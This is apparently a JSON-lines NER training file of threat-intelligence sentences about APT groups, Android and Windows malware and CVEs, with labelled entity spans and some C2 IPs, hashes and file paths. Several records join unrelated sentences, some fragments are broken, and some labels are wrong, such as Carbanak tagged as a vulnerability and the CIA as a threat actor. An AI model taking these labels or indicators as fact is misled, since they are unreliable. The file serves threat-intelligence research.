{"text": "Then , using POST requests to the relative address report.php , it sends data about the device ( IMEI , phone number , country , mobile operator , phone model , availability of root rights , OS version ) , list of contacts , list of installed apps , incoming SMS , and other information . FireEye iSIGHT Intelligence has been tracking a pair of cybercriminals that we refer to as the Vendetta Brothers . Another difference is the directory where the files are dropped , it's no longer C:\\Windows but rather the local setting of the current user (%USERPROFILE%\\Local Settings\\winnit\\winnit.exe) .", "spans": {"ORGANIZATION: FireEye iSIGHT": [[289, 303]], "THREAT_ACTOR: Vendetta Brothers": [[384, 401]], "FILEPATH: C:\\Windows": [[485, 495]], "FILEPATH: (%USERPROFILE%\\Local Settings\\winnit\\winnit.exe)": [[545, 593]]}, "info": {"id": "cyberner_stix_train_000902", "source": "cyberner_stix_train"}}
{"text": "It is a very unusual way to get Device Administrator rights . PCH is a nonprofit entity based in northern California that also manages significant amounts of the world 's DNS infrastructure , particularly the DNS for more than 500 top-level domains and a number of the Middle East top-level domains targeted by DNSpionage . As we stated in there port , our position was that “ The Chinese government may authorize this activity , but there ’s no way to determine the extent of its involvement. ” Now , three years later , we have the evidence required to change our assessment . • Based on the analysis , it appears that the MiniDuke - s creators provide a dynamic backup system that also can fly under the radar – if Twitter isn - t working or the accounts are down , the malware can use Google Search to find the encrypted strings to the next C2 .", "spans": {"THREAT_ACTOR: MiniDuke - s creators": [[625, 646]], "ORGANIZATION: Twitter": [[718, 725]], "MALWARE: malware": [[773, 780]], "ORGANIZATION: Google": [[789, 795]]}, "info": {"id": "cyberner_stix_train_000903", "source": "cyberner_stix_train"}}
{"text": "Some actions include ( with rough translations ) : The command-and-control server The command-and-control server is located at IP 64.78.161.133 . Tropic Trooper is also still exploiting CVE-2012-0158 , as are many threat actors . BlackOasis in recent months sent a wave of phishing emails .", "spans": {"THREAT_ACTOR: Tropic Trooper": [[146, 160]], "VULNERABILITY: CVE-2012-0158": [[186, 199]], "THREAT_ACTOR: BlackOasis": [[230, 240]], "TOOL: emails": [[282, 288]]}, "info": {"id": "cyberner_stix_train_000904", "source": "cyberner_stix_train"}}
{"text": "The following is a screenshot from IDA with comments showing the strings and JNI functions . Our direct observation of in-the-wild spearphishing attacks staged by the Bahamut group have been solely attempts to deceive targets into providing account passwords through impersonation of notices from platform providers . FileMG File Manager . winvnc Remote Desktop . rPortMap Port Forwarding . capsrv Video Device Spying . zxplug Add and load a ZxShell custom plugin . Wall to Wall reached out in July 2022 about collaborating with Bullock after KrebsOnSecurity published A Retrospective on the 2015 Ashley Madison Breach .", "spans": {"ORGANIZATION: platform providers": [[297, 315]], "MALWARE: ZxShell": [[442, 449]], "ORGANIZATION: Wall to Wall": [[466, 478]], "ORGANIZATION: Bullock": [[529, 536]], "ORGANIZATION: KrebsOnSecurity": [[543, 558]]}, "info": {"id": "cyberner_stix_train_000905", "source": "cyberner_stix_train"}}
{"text": "If the device is located outside Russia or is an emulator , the application displays a stub page : In this case , the Trojan ’ s logs contain records in Russian with grammatical errors and spelling mistakes : If the check is successful , Rotexy registers with GCM and launches SuperService which tracks if the Trojan has device administrator privileges . This blog post analyzes several recent Molerats attacks that deployed PIVY against targets in the Middle East and in the U.S. We also examine additional PIVY attacks that leverage Arabic-language content related to the ongoing crisis in Egypt and the wider Middle East to lure targets into opening malicious files . Microsoft addressed the SMBv1 vulnerabilities in March 2017 with Security Bulletin MS17-010 .", "spans": {"MALWARE: Rotexy": [[238, 244]], "SYSTEM: GCM": [[260, 263]], "TOOL: PIVY": [[425, 429]], "MALWARE: malicious files": [[653, 668]], "ORGANIZATION: Microsoft": [[671, 680]], "TOOL: SMBv1": [[695, 700]], "VULNERABILITY: vulnerabilities": [[701, 716]]}, "info": {"id": "cyberner_stix_train_000906", "source": "cyberner_stix_train"}}
{"text": "] com Counter Measures Use an up to date anti-malware software that is capable of identifying this threat . To enable connections to the infected computer using the Remote Desktop Protocol ( RDP ) , Carbanak sets Termservice service execution mode to Auto . Additionally , the group compromised organizations in Europe and North America that have ties to the Middle East .", "spans": {"TOOL: Remote Desktop Protocol": [[165, 188]], "TOOL: RDP": [[191, 194]], "VULNERABILITY: Carbanak": [[199, 207]]}, "info": {"id": "cyberner_stix_train_000907", "source": "cyberner_stix_train"}}
{"text": "Carbanak has its origin in more common financial fraud including theft from consumer and corporate bank accounts in Europe and Russia , using standard banking malware , mainly Carberp . Dubbed ‘Operation Sheep’ , this massive data stealing campaign is the first known campaign seen in the wild to exploit the Man-in-the-Disk vulnerability revealed by Check Point Research earlier last year .", "spans": {"VULNERABILITY: Carbanak": [[0, 8]], "TOOL: Carberp": [[176, 183]], "THREAT_ACTOR: ‘Operation Sheep’": [[193, 210]], "VULNERABILITY: exploit": [[297, 304]], "VULNERABILITY: Man-in-the-Disk": [[309, 324]]}, "info": {"id": "cyberner_stix_train_000908", "source": "cyberner_stix_train"}}
{"text": "CTU researchers have observed the threat actors employing legitimate Kaspersky antivirus variants in analyzed samples .", "spans": {"ORGANIZATION: CTU": [[0, 3]], "ORGANIZATION: Kaspersky": [[69, 78]]}, "info": {"id": "cyberner_stix_train_000909", "source": "cyberner_stix_train"}}
{"text": "F-Secure ’s whitepaper on CosmicDuke includes a timeline of the loader ’s usage , based on compilation timestamps .", "spans": {"ORGANIZATION: F-Secure": [[0, 8]], "MALWARE: CosmicDuke": [[26, 36]]}, "info": {"id": "cyberner_stix_train_000910", "source": "cyberner_stix_train"}}
{"text": "This group famously also reached out to WikiLeaks ( referred to as \" Organization 1 \" in the indictment ) to amplify their information operation , and they promoted the leaks to journalists through GRU -controlled email and social media accounts .", "spans": {"TOOL: WikiLeaks": [[40, 49]], "ORGANIZATION: GRU": [[198, 201]], "TOOL: email": [[214, 219]]}, "info": {"id": "cyberner_stix_train_000911", "source": "cyberner_stix_train"}}
{"text": "Perhaps more information on XLoader will be known in the future . We assess that APT28 is most likely sponsored by the Russian government . Once written, the send operations . As confirmed by our own research data , CISA also found LockBit took the top spot as the biggest global ransomware threat in 2022 .", "spans": {"MALWARE: XLoader": [[28, 35]], "THREAT_ACTOR: APT28": [[81, 86]], "ORGANIZATION: CISA": [[216, 220]], "THREAT_ACTOR: LockBit": [[232, 239]]}, "info": {"id": "cyberner_stix_train_000912", "source": "cyberner_stix_train"}}
{"text": "In order to track who opened the phishing emails , viewed the links , and downloaded the attachments in real-time , APT32 used cloud-based email analytics software designed for sales organizations . The attackers sent multiple emails containing macro-enabled XLS files to employees working in the banking sector in the Middle East .", "spans": {"THREAT_ACTOR: APT32": [[116, 121]], "ORGANIZATION: sales organizations": [[177, 196]], "THREAT_ACTOR: attackers": [[203, 212]], "TOOL: emails": [[227, 233]], "FILEPATH: XLS files": [[259, 268]], "ORGANIZATION: employees working in the banking sector": [[272, 311]]}, "info": {"id": "cyberner_stix_train_000913", "source": "cyberner_stix_train"}}
{"text": "The DNC announced it had suffered a network compromise and that a subsequent investigation found evidence of two breaches , attributed to APT28 and APT29 .", "spans": {"ORGANIZATION: DNC": [[4, 7]], "THREAT_ACTOR: APT28": [[138, 143]], "THREAT_ACTOR: APT29": [[148, 153]]}, "info": {"id": "cyberner_stix_train_000914", "source": "cyberner_stix_train"}}
{"text": "CTU researchers have observed BRONZE PRESIDENT targeting multiple NGOs .", "spans": {"ORGANIZATION: CTU": [[0, 3]], "THREAT_ACTOR: BRONZE PRESIDENT": [[30, 46]], "ORGANIZATION: NGOs": [[66, 70]]}, "info": {"id": "cyberner_stix_train_000915", "source": "cyberner_stix_train"}}
{"text": "Indicators of Compromise SHA256 Package App label 332e68d865009d627343b89a5744843e3fde4ae870193f36b82980363439a425 ufD.wykyx.vlhvh SEX kr porn 403401aa71df1830d294b78de0e5e867ee3738568369c48ffafe1b15f3145588 ufD.wyjyx.vahvh 佐川急便 466dafa82a4460dcad722d2ad9b8ca332e9a896fc59f06e16ebe981ad3838a6b Some of APT28 's more commonly used tools are the SOURFACE downloader , its second stage backdoor EVILTOSS , and a modular family of implants that we call CHOPSTICK . If the send function is being invoked in ping mode, the process described above is followed; however, instead of manually building and transmitting the DNS query, the [System.Net.Dns]::GetHostAddresses method is . In the months leading up to and after Russia ’s illegal further invasion began , Ukraine experienced a series of disruptive cyber operations , including website defacements , distributed denial - of - service ( DDoS ) attacks , and cyber attacks to delete data from computers belonging to government and private entities – all part of the Russian playbook .", "spans": {"THREAT_ACTOR: APT28": [[302, 307]], "TOOL: SOURFACE downloader": [[344, 363]], "TOOL: EVILTOSS": [[392, 400]], "TOOL: modular family of implants": [[409, 435]], "TOOL: CHOPSTICK": [[449, 458]], "ORGANIZATION: Ukraine": [[756, 763]], "THREAT_ACTOR: series of disruptive cyber operations": [[778, 815]]}, "info": {"id": "cyberner_stix_train_000916", "source": "cyberner_stix_train"}}
{"text": "'' The application uses the label \" Installer '' and its name is \" android.app.Application . The actor attempts to exploit CVE-2018–8440 — an elevation of privilege vulnerability in Windows when it improperly handles calls to Advanced Local Procedure Call — to elevate the privileges using a modified proof-of-concept exploit . In 2017 , APT37 targeted a company in Middle East that entered into a joint venture with the North Korean government to provide telecommunications service to the country .", "spans": {"THREAT_ACTOR: actor": [[97, 102]], "VULNERABILITY: CVE-2018–8440": [[123, 136]], "VULNERABILITY: vulnerability": [[165, 178]], "VULNERABILITY: proof-of-concept": [[301, 317]], "VULNERABILITY: exploit": [[318, 325]], "THREAT_ACTOR: APT37": [[338, 343]], "ORGANIZATION: telecommunications service": [[456, 482]]}, "info": {"id": "cyberner_stix_train_000917", "source": "cyberner_stix_train"}}
{"text": "Code contained inside one of the slides triggers an exploit for CVE-2017-8759 , a remote code execution vulnerability in Microsoft .NET framework . Turla is a notorious group that has been targeting government officials .", "spans": {"MALWARE: slides": [[33, 39]], "VULNERABILITY: CVE-2017-8759": [[64, 77]], "TOOL: Microsoft .NET framework": [[121, 145]], "THREAT_ACTOR: Turla": [[148, 153]], "ORGANIZATION: government officials": [[199, 219]]}, "info": {"id": "cyberner_stix_train_000918", "source": "cyberner_stix_train"}}
{"text": "Curiously , Bahamut appears to track password attempts in response to failed phishing attempts or to provoke the target to provide more passwords . Based on analysis of the group 's SWCs , TG-3390 operations likely affect organizations in other countries and verticals .", "spans": {"MALWARE: SWCs": [[182, 186]], "THREAT_ACTOR: TG-3390": [[189, 196]]}, "info": {"id": "cyberner_stix_train_000919", "source": "cyberner_stix_train"}}
{"text": "The iOS apps leverage the same C2 infrastructure as the Android version and use similar communications protocols . While this particular actor effectively used their almost worn out CVE-2012-0158 exploits in the past , Spring Dragon employs more involved and creative intrusive activity as well . Between February and March 2019 , probable MuddyWater-associated samples indicated that BlackWater established persistence on the compromised host , at used PowerShell commands to enumerate the victim 's machine and contained the IP address of the actor 's command and control ( C2 ) .", "spans": {"SYSTEM: iOS": [[4, 7]], "SYSTEM: Android": [[56, 63]], "THREAT_ACTOR: actor": [[137, 142], [545, 550]], "VULNERABILITY: CVE-2012-0158": [[182, 195]], "THREAT_ACTOR: Spring Dragon": [[219, 232]], "MALWARE: MuddyWater-associated samples": [[340, 369]], "MALWARE: PowerShell commands": [[454, 473]], "TOOL: C2": [[576, 578]]}, "info": {"id": "cyberner_stix_train_000920", "source": "cyberner_stix_train"}}
{"text": "TG-3390 uses older exploits to compromise targets , and CTU researchers have not observed the threat actors using zero-day exploits as of this publication . Conversely , LokiBot and Agent Tesla are new malware tools .", "spans": {"THREAT_ACTOR: TG-3390": [[0, 7]], "ORGANIZATION: CTU": [[56, 59]], "VULNERABILITY: zero-day exploits": [[114, 131]], "MALWARE: LokiBot": [[170, 177]], "MALWARE: Agent Tesla": [[182, 193]]}, "info": {"id": "cyberner_stix_train_000921", "source": "cyberner_stix_train"}}
{"text": "Better not to take any chances at all , no matter which version of the OS you use . this RTF exploits again the CVE-2017_1882 on eqnedt32.exe . The vulnerability was patched by Microsoft on Nov 14 , 2017 .", "spans": {"MALWARE: RTF": [[89, 92]], "VULNERABILITY: CVE-2017_1882": [[112, 125]], "MALWARE: eqnedt32.exe": [[129, 141]], "ORGANIZATION: Microsoft": [[177, 186]]}, "info": {"id": "cyberner_stix_train_000922", "source": "cyberner_stix_train"}}
{"text": "de.dkb.portalapp pl.pkobp.ipkobiznes pl.com.suntech.mobileconnect eu.eleader.mobilebanking.pekao.firm pl.mbank pl.upaid.nfcwallet.mbank eu.eleader.mobilebanking.bre pl.asseco.mpromak.android.app.bre pl.asseco.mpromak.android.app.bre.hd pl.mbank.mnews eu.eleader.mobilebanking.raiffeisen pl.raiffeisen.nfc hr.asseco.android.jimba.rmb PROMETHIUM is an activity group that has been active as early as 2012 . In the recent months , Ukrainian CERT ( CERT-UA ) reported an intensification of Gamaredon B-ACT S-APT Cyberattacks against military targets . The Aclip backdoor uses the Slack API to send system data , files , and screenshots to the C2 while receiving PowerShell commands at the same time .", "spans": {"THREAT_ACTOR: PROMETHIUM": [[333, 343]], "THREAT_ACTOR: activity group": [[350, 364]], "ORGANIZATION: Ukrainian CERT": [[428, 442]], "ORGANIZATION: CERT-UA": [[445, 452]], "MALWARE: Aclip backdoor": [[551, 565]], "TOOL: Slack API": [[575, 584]]}, "info": {"id": "cyberner_stix_train_000923", "source": "cyberner_stix_train"}}
{"text": "Shamoon2 : 5.254.100.200 .", "spans": {"MALWARE: Shamoon2": [[0, 8]], "IP_ADDRESS: 5.254.100.200": [[11, 24]]}, "info": {"id": "cyberner_stix_train_000924", "source": "cyberner_stix_train"}}
{"text": "One of the reasons Winexe is preferred over PSExec , is that it provides a Linux client , while PSExec doesn’t .", "spans": {"TOOL: Winexe": [[19, 25]], "TOOL: PSExec": [[44, 50], [96, 102]], "SYSTEM: Linux": [[75, 80]]}, "info": {"id": "cyberner_stix_train_000925", "source": "cyberner_stix_train"}}
{"text": "Based on the Tafacalou infection logs , we observed that most of the victims are in the following countries : Syria , Iran , Malaysia , USA , China , Turkey , Netherlands , Germany , Great Britain , Russia , Sweden , Austria , Algeria , Israel , Iraq , Morocco , New Zealand , Ukraine . Since 2013 Carbanak has successfully gained access to networks of more than 50 banks and 5 payment systems .", "spans": {"TOOL: Tafacalou": [[13, 22]], "MALWARE: Carbanak": [[298, 306]], "ORGANIZATION: banks": [[366, 371]], "ORGANIZATION: payment systems": [[378, 393]]}, "info": {"id": "cyberner_stix_train_000926", "source": "cyberner_stix_train"}}
{"text": ", a reference to Hamas military leader Mazen Fuqaha who was assassinated on March 24 , 2017 .", "spans": {"ORGANIZATION: Hamas": [[17, 22]]}, "info": {"id": "cyberner_stix_train_000927", "source": "cyberner_stix_train"}}
{"text": "Such notifications would be received by the MiHome app or any other , such as HenBox , so long as they register their intent to do so . Public reports of supply chain compromises linked to APT41 date back to at least 2014 , and technical evidence associated with these incidents was used to determine a relationship , if any , with APT41 . APT28 spearphished targets in several waves with Flash exploits leading to their Carberp based JHUHUGIT downloaders and further stages of malware .", "spans": {"SYSTEM: MiHome": [[44, 50]], "MALWARE: HenBox": [[78, 84]], "THREAT_ACTOR: APT41": [[189, 194], [332, 337]], "THREAT_ACTOR: APT28": [[340, 345]], "TOOL: Flash": [[389, 394]], "VULNERABILITY: exploits": [[395, 403]], "MALWARE: Carberp": [[421, 428]], "MALWARE: JHUHUGIT downloaders": [[435, 455]]}, "info": {"id": "cyberner_stix_train_000928", "source": "cyberner_stix_train"}}
{"text": "USPS is the most well-known branch of the US government and provides a publicly funded postal service . Recorded Future’s Insikt Group has been monitoring APT33 activity , beginning with research published in October 2017 , which revealed new infrastructure , malware hashes , and TTPs relating to the threat actor(s) . Kaspersky Lab 's research team responded to three financial institutions in Russia that were infected with the GCMAN malware .", "spans": {"ORGANIZATION: USPS": [[0, 4]], "ORGANIZATION: Recorded Future’s": [[104, 121]], "THREAT_ACTOR: Insikt": [[122, 128]], "THREAT_ACTOR: Group": [[129, 134]], "THREAT_ACTOR: APT33": [[155, 160]], "ORGANIZATION: Kaspersky Lab": [[320, 333]], "ORGANIZATION: financial institutions": [[370, 392]], "MALWARE: GCMAN": [[431, 436]], "MALWARE: malware": [[437, 444]]}, "info": {"id": "cyberner_stix_train_000929", "source": "cyberner_stix_train"}}
{"text": "Allows an application to read SMS messages . These redactions include ten of thousands of CIA targets and attack machines throughout Latin America , Europe and the United States . The group is believed to be Vietnam based .", "spans": {"THREAT_ACTOR: CIA": [[90, 93]]}, "info": {"id": "cyberner_stix_train_000930", "source": "cyberner_stix_train"}}
{"text": "Tactical threat intelligence is based on incident response investigations and research , and is mapped to the kill chain .", "spans": {}, "info": {"id": "cyberner_stix_train_000931", "source": "cyberner_stix_train"}}
{"text": "This blog post describes another attack campaign where attackers used the Uri terror attack and Kashmir protest themed spear phishing email to target officials in the Indian Embassies and Indian Ministry of External Affairs ( MEA ) .", "spans": {"TOOL: email": [[134, 139]], "ORGANIZATION: Indian Embassies": [[167, 183]], "ORGANIZATION: Indian Ministry of External Affairs": [[188, 223]], "ORGANIZATION: MEA": [[226, 229]]}, "info": {"id": "cyberner_stix_train_000932", "source": "cyberner_stix_train"}}
{"text": "The malware ’ s creators had used obfuscation to upload the new piece of malware to Google Play . Sometimes Patchwork send an MS PowerPoint document instead , which exploits CVE-2014-6352 . During our analysis of victim networks , we were able to observe APT10 once again initiate a retooling cycle in late 2016 .", "spans": {"SYSTEM: Google Play": [[84, 95]], "THREAT_ACTOR: Patchwork": [[108, 117]], "MALWARE: MS PowerPoint document": [[126, 148]], "VULNERABILITY: CVE-2014-6352": [[174, 187]], "THREAT_ACTOR: APT10": [[255, 260]]}, "info": {"id": "cyberner_stix_train_000933", "source": "cyberner_stix_train"}}
{"text": "Some of the documents exploited CVE-2017-0199 to deliver the payload . The threat actors use a commercial installation tool called Smart Installer Maker to encapsulate and execute a self-extracting RAR archive and in some cases a decoy slideshow or Flash installation application .", "spans": {"MALWARE: documents": [[12, 21]], "VULNERABILITY: CVE-2017-0199": [[32, 45]], "MALWARE: Smart Installer Maker": [[131, 152]], "MALWARE: self-extracting RAR": [[182, 201]], "MALWARE: decoy slideshow": [[230, 245]], "MALWARE: Flash installation application": [[249, 279]]}, "info": {"id": "cyberner_stix_train_000934", "source": "cyberner_stix_train"}}
{"text": "Sample 1 may use AES-encrypted strings with reflection , while Sample 2 ( submitted on the same day ) will use the same code but with plaintext strings . Blackgear has been targeting various industries since its emergence a decade ago . The new xor encoding byte is 0x5B . As well as SysUpdate , the attackers used a number of legitimate or publicly available tools to map the network and dump credentials .", "spans": {"ORGANIZATION: AES-encrypted": [[17, 30]], "MALWARE: SysUpdate": [[284, 293]], "THREAT_ACTOR: attackers": [[300, 309]], "TOOL: legitimate or publicly available tools": [[327, 365]]}, "info": {"id": "cyberner_stix_train_000935", "source": "cyberner_stix_train"}}
{"text": "The collection of basic device information . APT33 sent spear phishing emails to employees whose jobs related to the aviation industry . The developers used GCC compiler on Windows in the MinGW . Commercial spyware can be seen as having legitimate reasons to exist , especially in instances of crime and terrorism ( as long as it is highly regulated ) .", "spans": {"THREAT_ACTOR: APT33": [[45, 50]], "ORGANIZATION: employees": [[81, 90]], "ORGANIZATION: aviation industry": [[117, 134]], "TOOL: GCC": [[157, 160]], "SYSTEM: Windows": [[173, 180]], "TOOL: MinGW": [[188, 193]], "TOOL: Commercial spyware": [[196, 214]]}, "info": {"id": "cyberner_stix_train_000936", "source": "cyberner_stix_train"}}
{"text": "They are both targeting businesses using accounting software , are fingerprinting systems of interest similarly , are looking for smart card readers , and finally , they deploy an array of malicious tools to spy on their victims . Our investigation showed that these attacks were targeted , and that the threat actor sought to steal communications data of specific individuals in various countries .", "spans": {"ORGANIZATION: businesses": [[24, 34]], "ORGANIZATION: specific individuals": [[356, 376]]}, "info": {"id": "cyberner_stix_train_000937", "source": "cyberner_stix_train"}}
{"text": "July 14 A new zero-day vulnerability ( CVE-2015-2425 ) was found in Internet Explorer . The vulnerability was used to retrieve and execute Cobalt Strike from a remote server they controlled . However , DarkRace is a new ransomware group first discovered by researcher S!Ri .", "spans": {"VULNERABILITY: zero-day vulnerability": [[14, 36]], "VULNERABILITY: CVE-2015-2425": [[39, 52]], "SYSTEM: Internet Explorer": [[68, 85]], "TOOL: Cobalt Strike": [[139, 152]], "THREAT_ACTOR: DarkRace": [[202, 210]], "ORGANIZATION: S!Ri": [[268, 272]]}, "info": {"id": "cyberner_stix_train_000938", "source": "cyberner_stix_train"}}
{"text": "Table 4 HenBox variant 's Intents and Receivers Most of the intents registered in the AndroidManifest.xml file , or loaded during run-time , are commonly found in malicious Android apps . APT41 is well-known for leveraging compromised digital certificates from video game studios to sign malware . Previous work published by security vendor FireEye in October 2014 suggests the group might be of Russian origin .", "spans": {"MALWARE: HenBox": [[8, 14]], "SYSTEM: Android": [[173, 180]], "THREAT_ACTOR: APT41": [[188, 193]], "ORGANIZATION: FireEye": [[341, 348]]}, "info": {"id": "cyberner_stix_train_000939", "source": "cyberner_stix_train"}}
{"text": "Letting an attacker get access to this kind of data can have severe consequences . The document exploited CVE-2012-0158 and will decode and write an executable to disk upon infection . Attackers can point and click their ACT through a compromised network and exfiltrate data .", "spans": {"VULNERABILITY: CVE-2012-0158": [[106, 119]], "THREAT_ACTOR: Attackers": [[185, 194]]}, "info": {"id": "cyberner_stix_train_000940", "source": "cyberner_stix_train"}}
{"text": "” some_encrypted_data ” } .", "spans": {}, "info": {"id": "cyberner_stix_train_000941", "source": "cyberner_stix_train"}}
{"text": "This supports our analysis that the overarching theme in the Dukes ’ targeting is the collection of intelligence to support diplomatic efforts .", "spans": {"THREAT_ACTOR: Dukes": [[61, 66]]}, "info": {"id": "cyberner_stix_train_000942", "source": "cyberner_stix_train"}}
{"text": "] net page for DroidVPN remained identical when serving either HenBox or DroidVPN apps , just that the legitimate APK file had been replaced with HenBox for an unknown period of time . Raiu and his team have followed the digital tracks left behind by some of the Winnti hackers . Numbered Panda has a long list of high-profile victims and is known by a number of names including : DYNCALC , IXESHE , JOY RAT , APT-12 , etc .", "spans": {"MALWARE: HenBox": [[63, 69]], "ORGANIZATION: Raiu": [[185, 189]], "THREAT_ACTOR: Winnti": [[263, 269]], "THREAT_ACTOR: Numbered Panda": [[280, 294]], "THREAT_ACTOR: DYNCALC": [[381, 388]], "THREAT_ACTOR: IXESHE": [[391, 397]], "THREAT_ACTOR: JOY RAT": [[400, 407]], "THREAT_ACTOR: APT-12": [[410, 416]]}, "info": {"id": "cyberner_stix_train_000943", "source": "cyberner_stix_train"}}
{"text": "C:\\Users\\user\\runawy.exe .", "spans": {"FILEPATH: C:\\Users\\user\\runawy.exe": [[0, 24]]}, "info": {"id": "cyberner_stix_train_000944", "source": "cyberner_stix_train"}}
{"text": "We have also observed them using virtual private network services that use IPs based in numerous countries to ensure anonymity and obfuscate criminal operations . Like PLEAD , Shrouded Crossbow uses spear-phishing emails with backdoor-laden attachments that utilize the RTLO technique and accompanied by decoy documents .", "spans": {"MALWARE: them": [[22, 26]], "TOOL: emails": [[214, 220]], "MALWARE: RTLO technique": [[270, 284]], "FILEPATH: decoy documents": [[304, 319]]}, "info": {"id": "cyberner_stix_train_000946", "source": "cyberner_stix_train"}}
{"text": "First observed in mid-2014 , this malware shared code with the Bugat ( aka Feodo ) banking Trojan . Sometimes the attackers send an MS PowerPoint document instead , which exploits CVE-2014-6352 .", "spans": {"MALWARE: Bugat": [[63, 68]], "TOOL: banking Trojan": [[83, 97]], "THREAT_ACTOR: attackers": [[114, 123]], "FILEPATH: MS PowerPoint document": [[132, 154]], "VULNERABILITY: CVE-2014-6352": [[180, 193]]}, "info": {"id": "cyberner_stix_train_000947", "source": "cyberner_stix_train"}}
{"text": "FrozenCell is part of a very successful , multi-platform surveillance campaign . This next stage library copies itself into the System32 directory of the Windows folder after the hardcoded file name — either KBDLV2.DLL or AUTO.DLL , depending on the malware sample . We consider these domains to be “ hijacked ” because they were registered by someone for a legitimate reason , but have been leveraged by APT1 for malicious purposes . In our Google Analytics platform , we will see the data as : In our demo the DP will result in page view of Which will be decoded from base64 as : The source of the problem is that the CSP rule system is n’t granular enough .", "spans": {"MALWARE: FrozenCell": [[0, 10]], "MALWARE: KBDLV2.DLL": [[208, 218]], "MALWARE: AUTO.DLL": [[222, 230]], "THREAT_ACTOR: APT1": [[405, 409]], "SYSTEM: Google Analytics platform": [[442, 467]], "SYSTEM: CSP rule system": [[620, 635]]}, "info": {"id": "cyberner_stix_train_000948", "source": "cyberner_stix_train"}}
{"text": "The out-of-the-box server could not communicate with the client sample owing to the previously documented modifications that we had observed .", "spans": {"TOOL: out-of-the-box server": [[4, 25]]}, "info": {"id": "cyberner_stix_train_000949", "source": "cyberner_stix_train"}}
{"text": "Sofacy kicked off the year deploying two 0day in a spearphish document , both a Microsoft Office encapsulated postscript type confusion exploit ( abusing CVE-2017-0262 ) and an escalation of privilege use-after-free exploit ( abusing CVE-2017-0263 ) .", "spans": {"THREAT_ACTOR: Sofacy": [[0, 6]], "VULNERABILITY: 0day": [[41, 45]], "ORGANIZATION: Microsoft": [[80, 89]], "TOOL: Office": [[90, 96]], "VULNERABILITY: CVE-2017-0262": [[154, 167]], "VULNERABILITY: CVE-2017-0263": [[234, 247]]}, "info": {"id": "cyberner_stix_train_000950", "source": "cyberner_stix_train"}}
{"text": "Before patching , the Trojan will backup the original library with a name bak_ { original name } . For example , the actors behind FrozenCell used a spoofed app called Tawjihi 2016 , which Jordanian or Palestinian students would ordinarily use during their general secondary examination . Other threat actors may also be part of this wave of attacks , though there is no confirmation at the current time . For the CrySyS Lab analysis , please read [ here ] .", "spans": {"TOOL: FrozenCell": [[131, 141]], "TOOL: Tawjihi 2016": [[168, 180]], "ORGANIZATION: students": [[214, 222]], "ORGANIZATION: CrySyS Lab": [[414, 424]]}, "info": {"id": "cyberner_stix_train_000951", "source": "cyberner_stix_train"}}
{"text": "Meanwhile , parallel work at Dragos ( my employer , where I have performed significant work on the activity described above ) uncovered similar conclusions concerning TTPs and behaviors , for both the 2017 event and subsequent activity in other industrial sectors .", "spans": {"ORGANIZATION: Dragos": [[29, 35]]}, "info": {"id": "cyberner_stix_train_000952", "source": "cyberner_stix_train"}}
{"text": "Sofacy , also known as APT28 , Fancy Bear , and Tsar Team , is a highly active and prolific APT .", "spans": {"THREAT_ACTOR: Sofacy": [[0, 6]], "THREAT_ACTOR: APT28": [[23, 28]], "THREAT_ACTOR: Fancy Bear": [[31, 41]], "THREAT_ACTOR: Tsar Team": [[48, 57]]}, "info": {"id": "cyberner_stix_train_000953", "source": "cyberner_stix_train"}}
{"text": "Cannon opens the email with the correct subject and decodes the hexadecimal data in the body of the message to obtain the secondary email account .", "spans": {"MALWARE: Cannon": [[0, 6]], "TOOL: email": [[17, 22], [132, 137]]}, "info": {"id": "cyberner_stix_train_000954", "source": "cyberner_stix_train"}}
{"text": "] 26/html2/2018/GrafKey/new-inj-135-3-dark.html hxxp : //88.99.227 [ . Despite last month 's report on aspects of the MuddyWater campaign , the group is undeterred and continues to perform operations . This is the same domain used by the KHRAT S-MAL Trojan E-MAL . Adversaries may manipulate control systems devices or possibly leverage their own , to communicate with and command physical control processes .", "spans": {"THREAT_ACTOR: group": [[144, 149]], "MALWARE: KHRAT S-MAL": [[238, 249]], "MALWARE: Trojan E-MAL": [[250, 262]]}, "info": {"id": "cyberner_stix_train_000955", "source": "cyberner_stix_train"}}
{"text": "There are some indicators that this sample is just a test sample on its final stages of development . Using compromised accounts , LYCEUM send spearphishing emails with malicious Excel attachments to deliver the DanBot malware , which subsequently deploys post-intrusion tools . The APT38 targeted news outlets known for their business and financial sector reporting , probably in support of efforts to identify and compromise additional financial institutions .", "spans": {"THREAT_ACTOR: LYCEUM": [[131, 137]], "TOOL: post-intrusion tools": [[256, 276]], "THREAT_ACTOR: APT38": [[283, 288]], "ORGANIZATION: news outlets": [[298, 310]], "ORGANIZATION: financial sector": [[340, 356]], "ORGANIZATION: financial institutions": [[438, 460]]}, "info": {"id": "cyberner_stix_train_000956", "source": "cyberner_stix_train"}}
{"text": "As our investigation continued , we soon realized this was much larger than a few hacktools .", "spans": {}, "info": {"id": "cyberner_stix_train_000957", "source": "cyberner_stix_train"}}
{"text": "DanderSpritz consists entirely of plugins to gather intelligence , use exploits and examine already controlled machines . One narrowly-targeted spearphishing from Infy was sent from the compromised account of a political activist promoting participation inside of Iran , claiming to be a set of images of a British-Iranian dual national that has been held in Evin Prison for five years on espionage charges .", "spans": {"TOOL: DanderSpritz": [[0, 12]], "ORGANIZATION: political activist": [[211, 229]], "ORGANIZATION: British-Iranian": [[307, 322]]}, "info": {"id": "cyberner_stix_train_000958", "source": "cyberner_stix_train"}}
{"text": "We also discovered during our research that the RAT Server used by this attacker is itself vulnerable to remote attack , a double-edged sword for these attackers .", "spans": {"TOOL: RAT": [[48, 51]]}, "info": {"id": "cyberner_stix_train_000959", "source": "cyberner_stix_train"}}
{"text": "These threat actors appear to be choosing the right apps – those that could be popular with locals in the region , at the right time – while tensions grow in this region of China , to ensure a good victim install-base . We believe that like other Chinese espionage operators , APT41 has moved toward strategic intelligence collection and establishing access , but away from direct intellectual property theft . APT28 's malware settings suggest that the developers have done the majority of their work in a Russian language build environment during Russian business hours , which suggests that the Russian government is APT28 's sponsor .", "spans": {"THREAT_ACTOR: APT41": [[277, 282]], "THREAT_ACTOR: APT28": [[411, 416], [620, 625]], "ORGANIZATION: Russian government": [[598, 616]]}, "info": {"id": "cyberner_stix_train_000960", "source": "cyberner_stix_train"}}
